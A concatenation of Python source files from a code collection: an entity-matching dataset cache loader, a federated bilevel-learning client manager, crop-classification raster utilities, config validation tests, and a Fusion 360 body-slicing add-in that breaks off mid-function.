            return

        # To compute principal components, we need to compute weighted sequence embeddings
        # for each attribute. To do so, for each attribute, we first construct a neural
        # network to compute word embeddings and take their weighted average.
        field_embed: Dict[MatchingField, NoMeta] = {}
        embed: Dict[str, NoMeta] = {}
        inv_freq_pool = Pool("inv-freq-avg")
        for name in self.all_text_fields:
            field = self.fields[name]
            # Fields shared between attributes share one frozen embedding layer.
            if field not in field_embed:
                vectors_size = field.vocab.vectors.shape
                embed_layer = nn.Embedding(vectors_size[0], vectors_size[1])
                embed_layer.weight.data.copy_(field.vocab.vectors)  # type: ignore
                embed_layer.weight.requires_grad = False
                field_embed[field] = NoMeta(embed_layer)
            embed[name] = field_embed[field]

        # Create an iterator over the entire dataset.
        train_iter = MatchingIterator(
            self, self, train=False, batch_size=1024, device=-1, sort_in_buckets=False
        )
        attr_embeddings: Dict[str, List[torch.Tensor]] = defaultdict(list)

        # Run the constructed neural network to compute weighted sequence embeddings
        # for each attribute of each example in the dataset.
        for batch in pyprind.prog_bar(
            train_iter, title="\nComputing principal components"
        ):
            for name in self.all_text_fields:
                attr_input = getattr(batch, name)
                embeddings = inv_freq_pool(embed[name](attr_input))
                attr_embeddings[name].append(embeddings.data.data)

        # Compute the first principal component of weighted sequence embeddings for each
        # attribute.
        pc = {}
        for name in self.all_text_fields:
            concatenated = torch.cat(attr_embeddings[name])
            svd = TruncatedSVD(n_components=1, n_iter=7)
            svd.fit(concatenated.numpy())
            pc[name] = svd.components_[0]
        self.metadata["pc"] = pc
def finalize_metadata(self):
r"""Perform final touches to dataset metadata.
This allows performing modifications to metadata that cannot be serialized into
the cache.
"""
self.orig_metadata = copy.deepcopy(self.metadata)
for name in self.all_text_fields:
self.metadata["word_probs"][name] = defaultdict(
lambda: 1 / self.metadata["totals"][name],
self.metadata["word_probs"][name],
)
def get_raw_table(self):
r"""Create a raw pandas table containing all examples (tuple pairs) in the dataset.
To resurrect tokenized attributes, this method currently naively joins the tokens
using the whitespace delimiter.
"""
rows = []
columns = [name for name, field in six.iteritems(self.fields) if field]
for ex in self.examples:
row = []
for attr in columns:
if self.fields[attr]:
val = getattr(ex, attr)
if self.fields[attr].sequential:
val = " ".join(val)
row.append(val)
rows.append(row)
return pd.DataFrame(rows, columns=columns)
    def sort_key(self, ex):
        r"""Sort key for dataset examples.

        A key to use for sorting dataset examples for batching together examples with
        similar lengths to minimize padding.
        """
        # NOTE(review): ``interleave_keys`` is not among this module's visible
        # imports; it is presumably a helper defined elsewhere in this file
        # (torchtext's own ``interleave_keys`` takes two scalar keys, not a
        # list) — verify it resolves at runtime.
        return interleave_keys(
            [len(getattr(ex, attr)) for attr in self.all_text_fields]
        )
@staticmethod
def save_cache(datasets, fields, datafiles, cachefile, column_naming, state_args):
    r"""Save datasets and corresponding metadata to cache.

    This method also saves as many data loading arguments as possible to help
    ensure that the cache contents are still relevant for future data loading
    calls. Refer to :meth:`~data.Dataset.load_cache` for more details.

    Arguments:
        datasets (list): List of datasets to cache.
        fields (dict): Mapping from attribute names (e.g. "left_address") to
            corresponding :class:`~data.MatchingField` objects that specify how
            to process the field.
        datafiles (list): A list of the data files.
        cachefile (str): The cache file path.
        column_naming (dict): A `dict` containing column naming conventions.
            See `__init__` for details.
        state_args (dict): A `dict` containing other information about the
            state under which the cache was created.
    """
    # De-duplicate shared field objects: if several attributes share one field
    # instance, keep a single representative name per field for the vocab dump.
    name_for_field = {field: name for name, field in fields.items()}
    vocabs = {
        name: field.vocab
        for field, name in name_for_field.items()
        if field is not None and hasattr(field, "vocab")
    }
    # Record each field's preprocessing arguments (None for ignored columns)
    # so staleness can be detected later.
    field_args = {
        name: (field.preprocess_args() if field is not None else None)
        for name, field in fields.items()
    }
    payload = {
        "examples": [dataset.examples for dataset in datasets],
        "train_metadata": datasets[0].metadata,
        "vocabs": vocabs,
        "datafiles": datafiles,
        "datafiles_modified": [os.path.getmtime(f) for f in datafiles],
        "field_args": field_args,
        "state_args": state_args,
        "column_naming": column_naming,
    }
    torch.save(payload, cachefile)
@staticmethod
def load_cache(fields, datafiles, cachefile, column_naming, state_args):
    r"""Load datasets and corresponding metadata from cache.

    This method also checks whether any of the data loading arguments have changes
    that make the cache contents invalid. The following kinds of changes are currently
    detected automatically:

    * Data filename changes (e.g. different train filename)
    * Data file modifications (e.g. train data modified)
    * Column changes (e.g. using a different subset of columns in CSV file)
    * Column specification changes (e.g. changing lowercasing behavior)
    * Column naming convention changes (e.g. different labeled data column)

    Arguments:
        fields (dict): Mapping from attribute names (e.g. "left_address") to
            corresponding :class:`~data.MatchingField` objects that specify how to
            process the field.
        datafiles (list): A list of the data files.
        cachefile (str): The cache file path.
        column_naming (dict): A `dict` containing column naming conventions. See
            `__init__` for details.
        state_args (dict): A `dict` containing other information about the state under
            which the cache was created.

    Returns:
        Tuple containing unprocessed cache data dict and a list of cache staleness
        causes, if any.

    .. warning::
        Note that if a column specification, i.e., arguments to
        :class:`~data.MatchingField` include callable arguments (e.g. lambdas or
        functions) these arguments cannot be serialized and hence will not be checked
        for modifications.
    """
    cached_data = torch.load(cachefile)
    # Accumulate every independent reason the cache is stale; the caller
    # decides whether to raise or rebuild.
    cache_stale_cause = set()

    if datafiles != cached_data["datafiles"]:
        cache_stale_cause.add("Data file list has changed.")

    # Compare file modification times against those recorded at save time.
    datafiles_modified = [os.path.getmtime(datafile) for datafile in datafiles]
    if datafiles_modified != cached_data["datafiles_modified"]:
        cache_stale_cause.add("One or more data files have been modified.")

    if set(fields.keys()) != set(cached_data["field_args"].keys()):
        cache_stale_cause.add("Fields have changed.")

    for name, field in six.iteritems(fields):
        # A column flipped between "ignored" (None) and "used" is a mismatch.
        none_mismatch = (field is None) != (cached_data["field_args"][name] is None)
        args_mismatch = False
        if field is not None and cached_data["field_args"][name] is not None:
            # Compare serializable preprocessing arguments only (see warning).
            args_mismatch = (
                field.preprocess_args() != cached_data["field_args"][name]
            )
        if none_mismatch or args_mismatch:
            cache_stale_cause.add("Field arguments have changed.")
        if field is not None and not isinstance(field, MatchingField):
            cache_stale_cause.add("Cache update required.")

    if column_naming != cached_data["column_naming"]:
        cache_stale_cause.add("Other arguments have changed.")

    # Delegate state-level compatibility checks (e.g. PCA requirement).
    cache_stale_cause.update(
        MatchingDataset.state_args_compatibility(
            state_args, cached_data["state_args"]
        )
    )

    return cached_data, cache_stale_cause
@staticmethod
def state_args_compatibility(cur_state, old_state):
errors = []
if not old_state["train_pca"] and cur_state["train_pca"]:
errors.append("PCA computation necessary.")
return errors
@staticmethod
def restore_data(fields, cached_data):
    r"""Recreate datasets and related data from cache.

    This restores all datasets, metadata and attribute information (including the
    vocabulary and word embeddings for all tokens in each attribute).

    Note: unlike ``load_cache``, ``fields`` here is the original list of
    (name, field) tuples, which is why it is iterated directly below.
    """
    datasets = []
    for d in range(len(cached_data["datafiles"])):
        # Only the first (train) split carries metadata in the cache.
        metadata = None
        if d == 0:
            metadata = cached_data["train_metadata"]
        dataset = MatchingDataset(
            path=cached_data["datafiles"][d],
            fields=fields,
            examples=cached_data["examples"][d],
            metadata=metadata,
            column_naming=cached_data["column_naming"],
        )
        datasets.append(dataset)

    # Reattach the cached vocabularies to the fields that had one.
    for name, field in fields:
        if name in cached_data["vocabs"]:
            field.vocab = cached_data["vocabs"][name]

    return datasets
@classmethod
def splits(
    cls,
    path,
    train=None,
    validation=None,
    test=None,
    fields=None,
    embeddings=None,
    embeddings_cache=None,
    column_naming=None,
    cache=None,
    check_cached_data=True,
    auto_rebuild_cache=False,
    train_pca=False,
    **kwargs
):
    """Create Dataset objects for multiple splits of a dataset.

    Args:
        path (str): Common prefix of the splits' file paths.
        train (str): Suffix to add to path for the train set.
        validation (str): Suffix to add to path for the validation set, or None
            for no validation set. Default is None.
        test (str): Suffix to add to path for the test set, or None for no test
            set. Default is None.
        fields (list(tuple(str, MatchingField))): A list of tuples containing column
            name (e.g. "left_address") and corresponding :class:`~data.MatchingField`
            pairs, in the same order that the columns occur in the CSV file. Tuples of
            (name, None) represent columns that will be ignored.
        embeddings (str or list): Same as `embeddings` parameter of
            :func:`~data.process`.
        embeddings_cache (str): Directory to store dowloaded word vector data.
        column_naming (dict): Same as `column_naming` paramter of `__init__`.
        cache (str): Suffix to add to path for cache file. If `None` disables caching.
        check_cached_data (bool): Verify that data files haven't changes since the
            cache was constructed and that relevant field options haven't changed.
        auto_rebuild_cache (bool): Automatically rebuild the cache if the data files
            are modified or if the field options change. Defaults to False.
        train_pca (bool): Whether to compute PCA for each attribute as part of
            dataset metadata compuatation. Defaults to False.
        filter_pred (callable or None): Use only examples for which
            filter_pred(example) is True, or use all examples if None.
            Default is None. This is a keyword-only parameter.

    Returns:
        Tuple[MatchingDataset]: Datasets for (train, validation, and test) splits in
        that order, if provided.
    """
    fields_dict = dict(fields)
    state_args = {"train_pca": train_pca}

    # First, try to restore everything from the cache. Any staleness or a
    # missing cache file leaves ``datasets`` as None and forces a fresh load.
    datasets = None
    if cache:
        datafiles = [f for f in (train, validation, test) if f is not None]
        datafiles = [os.path.expanduser(os.path.join(path, d)) for d in datafiles]
        cachefile = os.path.expanduser(os.path.join(path, cache))
        try:
            cached_data, cache_stale_cause = MatchingDataset.load_cache(
                fields_dict, datafiles, cachefile, column_naming, state_args
            )
            if check_cached_data and cache_stale_cause:
                if not auto_rebuild_cache:
                    raise MatchingDataset.CacheStaleException(cache_stale_cause)
                else:
                    logger.warning(
                        "Rebuilding data cache because: %s", list(cache_stale_cause)
                    )
            if not check_cached_data or not cache_stale_cause:
                datasets = MatchingDataset.restore_data(fields, cached_data)
        except IOError:
            # No cache file yet; fall through to a fresh load.
            pass

    if not datasets:
        begin = timer()
        dataset_args = {"fields": fields, "column_naming": column_naming, **kwargs}
        train_data = (
            None
            if train is None
            else cls(path=os.path.join(path, train), **dataset_args)
        )
        val_data = (
            None
            if validation is None
            else cls(path=os.path.join(path, validation), **dataset_args)
        )
        test_data = (
            None
            if test is None
            else cls(path=os.path.join(path, test), **dataset_args)
        )
        datasets = tuple(
            d for d in (train_data, val_data, test_data) if d is not None
        )
        after_load = timer()
        logger.info("Data load took: {}s".format(after_load - begin))

        # Build the vocabulary once per distinct field object (fields may be
        # shared between attributes, e.g. left/right columns).
        fields_set = set(fields_dict.values())
        for field in fields_set:
            if field is not None and field.use_vocab:
                field.build_vocab(
                    *datasets, vectors=embeddings, cache=embeddings_cache
                )
        after_vocab = timer()
        logger.info("Vocab construction time: {}s".format(after_vocab - after_load))

        if train:
            datasets[0].compute_metadata(train_pca)
        after_metadata = timer()
        logger.info(
            "Metadata computation time: {}s".format(after_metadata - after_vocab)
        )

        if cache:
            MatchingDataset.save_cache(
                datasets,
                fields_dict,
                datafiles,
                cachefile,
                column_naming,
                state_args,
            )
            after_cache = timer()
            # NOTE(review): measured from ``after_vocab``, so this duration
            # also includes the metadata computation time above.
            logger.info("Cache save time: {}s".format(after_cache - after_vocab))

    if train:
        # finalize_metadata installs non-serializable structures, so it runs
        # after (not before) the cache save above.
        datasets[0].finalize_metadata()

        # Save additional information to train dataset.
        datasets[0].embeddings = embeddings
        datasets[0].embeddings_cache = embeddings_cache
        datasets[0].train_pca = train_pca

    # Set vocabs: every split shares the train split's field vocabularies.
    for dataset in datasets:
        dataset.vocabs = {
            name: datasets[0].fields[name].vocab
            for name in datasets[0].all_text_fields
        }

    if len(datasets) == 1:
        return datasets[0]
    return tuple(datasets)
def interleave_keys(keys):
    r"""Interleave the bits of several sort keys into one joint sort key.

    Each key is rendered as a fixed 16-bit binary string and the strings are
    interleaved bit-by-bit, so values that are similar in every key produce
    similar joint keys. Useful for length-bucketing examples with multiple
    text fields (e.g. machine translation or natural language inference).
    """
    binary_strings = [format(key, "016b") for key in keys]
    interleaved = "".join("".join(column) for column in zip(*binary_strings))
    return int(interleaved, base=2)
| StarcoderdataPython |
1681325 | import copy
from cv2 import log
import numpy as np
import torch
from utils.Fed import FedAvg,FedAvgGradient, FedAvgP
from core.mm_fmnist.SGDClient_fm import SGDClient
from core.mm_fmnist.SVRGClient_fm import SVRGClient
from core.mm_fmnist.Client_fm import Client
from core.ClientManage import ClientManage
class ClientManageMM(ClientManage):
    """Client manager for the multi-modal Fashion-MNIST federated bilevel setup.

    Orchestrates one communication round over the selected clients: inner
    (model-weight) training via :meth:`fed_in`, outer (hyper-gradient)
    aggregation via :meth:`fed_out`/:meth:`lfed_out`, or both jointly via
    :meth:`fed_joint`.
    """

    def __init__(self, args, net_glob, client_idx, dataset, dict_users, hyper_param) -> None:
        super().__init__(args, net_glob, client_idx, dataset, dict_users, hyper_param)
        # Re-assign locally for clarity (the base class may store these too).
        self.client_idx = client_idx
        self.args = args
        self.dataset = dataset
        self.dict_users = dict_users
        # Deep-copy so per-round hyper-parameter mutations stay local.
        self.hyper_param = copy.deepcopy(hyper_param)

    def _build_clients(self, temp_net):
        """Instantiate one inner-optimizer client per selected index.

        For SVRG, also collects each client's full-batch gradient and shares
        the average with every client (the SVRG control variate).

        Returns:
            list: clients, in the same order as ``self.client_idx``.
        """
        client_locals = []
        grad_locals = []
        for idx in self.client_idx:
            if self.args.optim == 'sgd':
                client = SGDClient(self.args, idx, copy.deepcopy(temp_net),
                                   self.dataset, self.dict_users, self.hyper_param)
            elif self.args.optim == 'svrg':
                client = SVRGClient(self.args, idx, copy.deepcopy(temp_net),
                                    self.dataset, self.dict_users, self.hyper_param)
                grad_locals.append(client.batch_grad())
            else:
                raise NotImplementedError
            client_locals.append(client)
        if self.args.optim == 'svrg':
            avg_grad = FedAvgGradient(grad_locals)
            for client in client_locals:
                client.set_avg_q(avg_grad)
        return client_locals

    def _local_training(self, client_locals):
        """Run one local training epoch per client.

        Returns:
            tuple: (w_locals, avg_loss) where ``w_locals`` is the list of local
            state dicts ready for FedAvg.
        """
        if self.args.all_clients:
            print("Aggregation over all clients")
            w_glob = self.net_glob.state_dict()
            w_locals = [w_glob for _ in range(self.args.num_users)]
        else:
            w_locals = []
        loss_locals = []
        # BUG FIX: the original loop iterated only over clients and indexed
        # ``w_locals[idx]`` with the *stale* ``idx`` left over from client
        # construction, so with ``all_clients`` every result was written to
        # the same slot. Pair each client with its own index instead
        # (client_locals was built in client_idx order).
        for idx, client in zip(self.client_idx, client_locals):
            w, loss = client.train_epoch()
            if self.args.all_clients:
                w_locals[idx] = copy.deepcopy(w)
            else:
                w_locals.append(copy.deepcopy(w))
            loss_locals.append(copy.deepcopy(loss))
        return w_locals, sum(loss_locals) / len(loss_locals)

    def fed_in(self):
        """Inner-problem round: train model weights with outer params frozen.

        Returns:
            tuple: (aggregated global state_dict, average training loss).
        """
        temp_net = copy.deepcopy(self.net_glob)
        # Freeze outer (hyper) parameters so local training only updates the
        # inner weights.
        for name, w in temp_net.named_parameters():
            if "outer" in name:
                w.requires_grad = False
        client_locals = self._build_clients(temp_net)
        w_locals, loss_avg = self._local_training(client_locals)
        # Update and install the new global weights.
        w_glob = FedAvg(w_locals)
        self.net_glob.load_state_dict(w_glob)
        return w_glob, loss_avg

    def lfed_out(self, client_locals):
        """Local outer update: each client takes ``outer_tau`` hyper-gradient
        steps on its own; the resulting updates are then averaged once.

        Returns:
            tuple: (averaged hyper update, communication rounds used == 1).
        """
        hg_locals = []
        for client in client_locals:
            for _ in range(self.args.outer_tau):
                hg_client = client.hyper_grad(None)
                hg = client.hyper_update(hg_client)
            hg_locals.append(hg)
        hg_glob = FedAvgP(hg_locals, self.args)
        return hg_glob, 1

    def fed_out(self):
        """Outer-problem round: aggregate hyper-gradients across clients.

        With ``hvp_method == 'seperate'`` (spelling as used by the args),
        falls back to the purely local variant (:meth:`lfed_out`); otherwise
        performs a globally averaged hyper-gradient step followed by
        SVRG-corrected local steps.

        Returns:
            tuple: (averaged hyper update, number of communication rounds).
        """
        client_locals = [
            Client(self.args, idx, copy.deepcopy(self.net_glob),
                   self.dataset, self.dict_users, self.hyper_param)
            for idx in self.client_idx
        ]
        if self.args.hvp_method == 'seperate':
            return self.lfed_out(client_locals)
        comm_round = 0
        # Round 1: plain averaged hyper-gradient.
        hg_locals = [client.hyper_grad(None) for client in client_locals]
        hg_glob = FedAvgP(hg_locals, self.args)
        comm_round += 1
        # Round 2: outer_tau variance-reduced local steps per client, then
        # average the final iterates.
        hg_locals = []
        for client in client_locals:
            for _ in range(self.args.outer_tau):
                h = client.hyper_svrg_update(hg_glob)
            hg_locals.append(h)
        hg_glob = FedAvgP(hg_locals, self.args)
        comm_round += 1
        return hg_glob, comm_round

    def fed_joint(self):
        """Run inner training and local outer updates in one round.

        Unlike :meth:`fed_in`, outer parameters are NOT frozen here, matching
        the original behavior. Ordering is preserved: local training first,
        then the outer update, then weight aggregation.

        Returns:
            tuple: (aggregated weights, average loss, hyper update, comm rounds).
        """
        client_locals = self._build_clients(copy.deepcopy(self.net_glob))
        w_locals, loss_avg = self._local_training(client_locals)
        hg_glob, comm_round = self.lfed_out(client_locals)
        w_glob = FedAvg(w_locals)
        self.net_glob.load_state_dict(w_glob)
        return w_glob, loss_avg, hg_glob, comm_round
| StarcoderdataPython |
51573 | <filename>crop_type_mapping/ml_crop_cli/ml_crop/utils_data.py
import geopandas as gpd
import numpy as np
import rasterio
from rasterio.features import rasterize
from rasterstats.io import bounds_window
from sklearn.model_selection import train_test_split
def crop_classes(train_geo):
    """Map each crop-type name in the training vector file to an integer label.

    Reads the vector file with geopandas and assigns consecutive integers
    (starting at 0) to the sorted unique values of the ``name`` column.
    """
    training_vectors = gpd.read_file(train_geo)
    unique_names = np.unique(training_vectors.name)
    return {label: index for index, label in enumerate(unique_names)}
def all_values(x):
    """Identity helper: return the input unchanged.

    Presumably intended as a custom-stats callback (e.g. for rasterstats'
    ``add_stats``) so callers receive the raw masked pixel array —
    TODO confirm against the call site.
    """
    return x
def train_raw(raster_file, train_geo):
    """Extract per-pixel training samples from a raster, one per labeled pixel.

    For each training polygon, reads the raster window covering the polygon's
    bounds, rasterizes the polygon into a boolean mask, and collects the band
    values of every masked pixel together with the polygon's integer class
    label (from :func:`crop_classes`).

    Returns:
        tuple: (x_raw, y_raw) — a list of per-pixel band-value vectors and the
        matching list of integer class labels.
    """
    training_vectors = gpd.read_file(train_geo)
    class_dict = crop_classes(train_geo)
    print(class_dict)
    # set up our training data lists
    # this larger cell reads data from a raster file for each training vector
    x_raw = []
    y_raw = []
    with rasterio.open(raster_file, 'r') as src:
        for (label, geom) in zip(
                training_vectors.name,
                training_vectors.geometry):
            # read the raster data matching the geometry bounds
            window = bounds_window(geom.bounds, src.transform)
            # store our window information
            window_affine = src.window_transform(window)
            fsrc = src.read(window=window)
            # rasterize the geometry into the larger shape and affine
            mask = rasterize(
                [(geom, 1)],
                out_shape=fsrc.shape[1:],
                transform=window_affine,
                fill=0,
                dtype='uint8',
                all_touched=True
            ).astype(bool)
            # for each label pixel (places where the mask is true)...
            label_pixels = np.argwhere(mask)
            for (row, col) in label_pixels:
                # add a pixel of data to X; NaNs are replaced by a small
                # epsilon so downstream models don't choke on missing data
                data = fsrc[:, row, col]
                one_x = np.nan_to_num(data, nan=1e-3)
                x_raw.append(one_x)
                y_raw.append(class_dict[label])
    return x_raw, y_raw
def norm_inds(arr, a, b):
    """Compute a normalized-difference index between two bands of ``arr``.

    Returns ``(arr[..., a] - arr[..., b]) / (arr[..., a] + arr[..., b])`` with
    a new length-1 axis inserted at position 1, ready to be concatenated with
    the original band matrix (used for NDVI/NDWI-style indices).
    """
    band_a = arr[..., a]
    band_b = arr[..., b]
    ratio = (band_a - band_b) / (band_a + band_b)
    return np.expand_dims(ratio, axis=1)
def train_split(X_raw, Y_raw):
    """Assemble the feature matrix, append NDVI/NDWI-style indices, and split.

    Band-index assumption: norm_inds(X, 3, 2) is treated as NDVI and
    norm_inds(X, 1, 3) as NDWI, implying band 1 = green, 2 = red, 3 = NIR —
    TODO confirm against the raster's actual band layout.

    Returns:
        tuple: (X_train, X_test, y_train, y_test, class_weight_dict, labels),
        where class_weight_dict maps each training label to its unnormalized
        inverse frequency.
    """
    X = np.array(X_raw)
    y = np.array(Y_raw)
    print("training data shape is")
    print(X.shape, y.shape)
    ndvi = norm_inds(X, 3, 2)
    ndwi = norm_inds(X, 1, 3)
    X = np.concatenate([X, ndvi, ndwi], axis=1)
    # Fixed seed for a reproducible 80/20 train/test split.
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
    # Inverse-frequency class weights computed from the training labels only.
    labels, counts = np.unique(y_train, return_counts=True)
    class_weight_dict = dict(zip(labels, 1/counts))
    return X_train, X_test, y_train, y_test, class_weight_dict, labels
| StarcoderdataPython |
3222799 | <reponame>luxbe/sledo
import copy
from typing import Dict

import pytest
import yaml
from schema import SchemaError

from sledo.generate.config import validateConfig
# Shared fixture: the reference configuration is loaded once at import time.
# NOTE(review): tests that mutate nested values must deep-copy this dict —
# dict(base_config) copies only the top level.
base_config: Dict = {}
with open("tests/resources/config.yaml") as f:
    base_config = yaml.load(f, Loader=yaml.BaseLoader)
def test_validation_no_keys():
    """An empty config must be rejected: 'schemas' is mandatory."""
    with pytest.raises(SchemaError) as excinfo:
        validateConfig({})
    assert "Missing key: 'schemas'" in str(
        excinfo.value), "Expected the key 'schemas' to be required"
def test_validation_initial():
    """'initial' must reference a declared step."""
    cfg = dict(base_config)
    cfg["initial"] = "invalid"
    with pytest.raises(SchemaError) as excinfo:
        validateConfig(cfg)
    assert "Missing step: 'invalid'" in str(excinfo.value)
def test_validation_steps_generate():
    """A step's 'generate' target must reference a declared schema."""
    # Deep-copy the fixture: dict(base_config) shares the nested dicts, so
    # mutating config["steps"][...] would leak into base_config and pollute
    # every test that runs afterwards.
    config = copy.deepcopy(base_config)
    config["steps"]["create_order"]["generate"] = "invalid"
    with pytest.raises(SchemaError) as ctx:
        validateConfig(config)
    assert "Missing schema: 'invalid'" in str(ctx.value)
def test_validation_steps_generate_probability():
    """Generation probabilities within one step must not sum above 1."""
    # Deep-copy the fixture: dict(base_config) shares the nested dicts, so
    # mutating config["steps"][...] would leak into base_config and pollute
    # every test that runs afterwards.
    config = copy.deepcopy(base_config)
    config["steps"]["create_order"]["generate"] = {
        "Invoice": 0.7,
        "Order": 0.6
    }
    with pytest.raises(SchemaError) as ctx:
        validateConfig(config)
    assert "The total probability must not be more than 1 at step: 'create_order'" in str(
        ctx.value)
| StarcoderdataPython |
1670600 | import adsk
import adsk.core
import adsk.fusion
import traceback
from collections import defaultdict, namedtuple
from typing import List
from .Fusion360Utilities.Fusion360Utilities import get_app_objects
from .Fusion360Utilities.Fusion360CommandBase import Fusion360CommandBase
from .Fusion360Utilities import Fusion360Utilities as futil
# Lightweight records passed between the slicing helpers below.
# Post: a vertical post line between a top and a bottom intersection point.
Post = namedtuple('Post', ('top_point', 'bottom_point', 'line', 'length'))
# Post_Point: one end of a post, with the body/sketch-face/line it lies on.
Post_Point = namedtuple('Post_Point', ('point', 'body', 'sketch_face', 'line', 'length'))
# SliceFace: a mid-plane face paired with the solid body it was cut from.
SliceFace = namedtuple('SliceFace', ('face', 'body'))
# SliceComponent: a created slice occurrence plus its end-face reference.
SliceComponent = namedtuple('SliceComponent', ('occurrence', 'end_face'))
# Should move to utilities
def add_construction_sketch(sketches, plane):
    """Create a sketch on ``plane`` and mark every curve it starts with as
    construction geometry, so later projected edges are distinguishable."""
    new_sketch = sketches.add(plane)
    for sketch_curve in new_sketch.sketchCurves:
        sketch_curve.isConstruction = True
    return new_sketch
# Module-level placeholder for the active slicer definition; assigned at runtime.
SLICERDEF = None
# TODO Master list
# Identify which module each piece is in after dove tails.
# Show identification? Sketch on the model once its flat.
# For Dove Tails model flush "body split"
# Create slice in a given direction
def create_slices2(target_body, spacing, qty, base_plane, slice_thickness, name):
    """Create ``qty`` parallel slices of ``target_body``.

    Construction planes are offset from ``base_plane`` at multiples of
    ``spacing``; :func:`create_slice` is invoked once per plane and appends its
    results to the returned lists.

    Returns:
        tuple: (component_slices, face_slices) accumulated across all planes.
    """
    target_comp = target_body.parentComponent
    # Feature Collections
    planes = target_comp.constructionPlanes
    component_slices = []
    face_slices = []
    for i in range(1, qty + 1):
        offset_value = adsk.core.ValueInput.createByReal(i * spacing)
        # Create construction plane input
        plane_input = planes.createInput()
        # Add construction plane by offset
        plane_input.setByOffset(base_plane, offset_value)
        plane = planes.add(plane_input)
        plane.name = name + '-' + str(i)
        slice_name = name + '-' + str(i)
        create_slice(plane, slice_thickness, target_body, face_slices, component_slices, slice_name)
    return component_slices, face_slices
def create_slice(plane: adsk.fusion.ConstructionPlane, slice_thickness: float, target_body: adsk.fusion.BRepBody,
                 face_slices, component_slices, slice_name):
    """Create one slice component of ``target_body`` centered on ``plane``.

    Projects the body's cut edges on the mid plane and on two planes offset by
    +/- half the slice thickness, patches the contained profiles, extrudes the
    "plus" profiles back through the slice thickness, then intersects with the
    "minus" profiles so the slice respects the body's varying cross-section.
    Results are appended to ``face_slices`` (via :func:`create_face_slices`)
    and ``component_slices``. Slices with no material on an offset plane are
    renamed with a ``----FIX__ME`` suffix and skipped.
    """
    ao = get_app_objects()
    design = ao['design']
    target_comp = target_body.parentComponent
    new_occurrence = target_comp.occurrences.addNewComponent(adsk.core.Matrix3D.create())
    new_occurrence.activate()
    new_occurrence.component.name = slice_name
    # Feature Collections
    sketches = new_occurrence.component.sketches
    patches = new_occurrence.component.features.patchFeatures
    extrude_features = new_occurrence.component.features.extrudeFeatures
    # Create the sketch
    # todo fix plane creation
    mid_plane = plane
    mid_sketch = add_construction_sketch(sketches, mid_plane)
    mid_sketch.projectCutEdges(target_body)
    mid_sketch.name = 'Mid_Sketch'
    plus_plane = create_offset_plane(new_occurrence.component, slice_thickness / 2, plane)
    plus_plane.name = 'Plus_Plane'
    plus_sketch = add_construction_sketch(sketches, plus_plane)
    plus_sketch.projectCutEdges(target_body)
    plus_sketch.name = 'Plus_Sketch'
    minus_plane = create_offset_plane(new_occurrence.component, -slice_thickness / 2, plane)
    minus_plane.name = 'Minus_Plane'
    minus_sketch = add_construction_sketch(sketches, minus_plane)
    minus_sketch.projectCutEdges(target_body)
    minus_sketch.name = 'Minus_Sketch'
    # Mid-plane patch faces are kept (True flag) for later post/face pairing.
    mid_slices = []
    get_contained_profiles(mid_sketch, patches, target_body, True, mid_slices)
    plus_profiles = get_contained_profiles(plus_sketch, patches, target_body)
    minus_profiles = get_contained_profiles(minus_sketch, patches, target_body)
    thickness_value = adsk.core.ValueInput.createByReal(slice_thickness)
    negative_thickness_value = adsk.core.ValueInput.createByReal(-slice_thickness)
    if plus_profiles.count == 0:
        # Nothing of the body intersects the plus plane; flag for manual repair.
        new_occurrence.component.name += '----FIX__ME'
        plus_sketch.name += '----FIX__ME'
        return
    plus_extrude = extrude_features.addSimple(plus_profiles, negative_thickness_value,
                                              adsk.fusion.FeatureOperations.NewBodyFeatureOperation)
    plus_bodies = []
    for body in plus_extrude.bodies:
        plus_bodies.append(body)
    create_face_slices(plus_extrude.endFaces, mid_slices, face_slices)
    # end_face = plus_extrude.endFaces[0]
    if minus_profiles.count == 0:
        new_occurrence.component.name += '----FIX__ME'
        minus_sketch.name += '----FIX__ME'
        return
    minus_extrude = extrude_features.addSimple(minus_profiles, thickness_value,
                                               adsk.fusion.FeatureOperations.IntersectFeatureOperation)
    # Get the current position of the timeline.
    start_position = design.timeline.markerPosition
    # Roll back so the intersect can be restricted to the fresh plus bodies,
    # then restore the timeline position.
    minus_extrude.timelineObject.rollTo(True)
    minus_extrude.participantBodies = plus_bodies
    design.timeline.markerPosition = start_position
    design.activateRootComponent()
    # (historical notes kept from the original)
    # slice_face = SliceFace()
    # slice_component = SliceComponent(new_occurrence, end_face)
    # moved_body = face.body.moveToComponent(new_occurrence)
    # moved_face = moved_body.faces.item(0)
    # SliceFace = namedtuple('SliceFace', ('face', 'body'))
    # SliceComponent = namedtuple('SliceComponent', ('occurrence', 'end_face'))
    # Todo build slices from list
    # Todo Build Slice components
    # Todo fix references
    # return SliceComponent(new_occurrence, end_face)
    # if not end_face.isValid:
    #     end_face = minus_extrude.endFaces[0]
    # NOTE(review): uses the last mid-plane patch face as the component's end
    # face — confirm this is the intended face when a slice has several regions.
    end_face = mid_slices[-1]
    component_slices.append(SliceComponent(new_occurrence, end_face))
def create_face_slices(extrude_faces, mid_faces, face_slices):
    """Pair each mid-plane face with the extruded body it belongs to.

    Both face sets are sorted by surface area and matched position-by-position.
    NOTE(review): this pairing assumes the two sets have equal length and a
    one-to-one area correspondence — confirm it holds when a slice produces
    several disjoint regions of similar area.
    """
    extrude_bodies = []
    mid_bodies = []
    for e_face in extrude_faces:
        extrude_dict = {'body': e_face.body, 'area': e_face.evaluator.area, 'face': e_face}
        extrude_bodies.append(extrude_dict)
    for m_face in mid_faces:
        extrude_dict = {'body': m_face.body, 'area': m_face.evaluator.area, 'face': m_face}
        mid_bodies.append(extrude_dict)
    # Sort both sides by area so matching entries line up index-by-index.
    extrude_bodies = sorted(extrude_bodies, key=lambda k: k["area"])
    mid_bodies = sorted(mid_bodies, key=lambda k: k["area"])
    for i, mid_body in enumerate(mid_bodies):
        # Matched pair: mid-plane face + corresponding extruded body.
        new_slice = SliceFace(mid_bodies[i]['face'], extrude_bodies[i]['body'])
        face_slices.append(new_slice)
def get_contained_profiles(sketch, patches, target_body, is_mid_plane=False, mid_slices=None):
    """Collect the sketch profiles that lie inside ``target_body``.

    Each profile is temporarily patched into a surface so a point on it can be
    classified against the solid. Patches for profiles outside the body are
    deleted. On mid-plane calls (``is_mid_plane=True``) the surviving patch
    faces are kept alive and appended to ``mid_slices``; otherwise the patch is
    deleted and only the profile is retained.

    Returns:
        adsk.core.ObjectCollection: profiles contained in the body.
    """
    extrude_profiles = adsk.core.ObjectCollection.create()
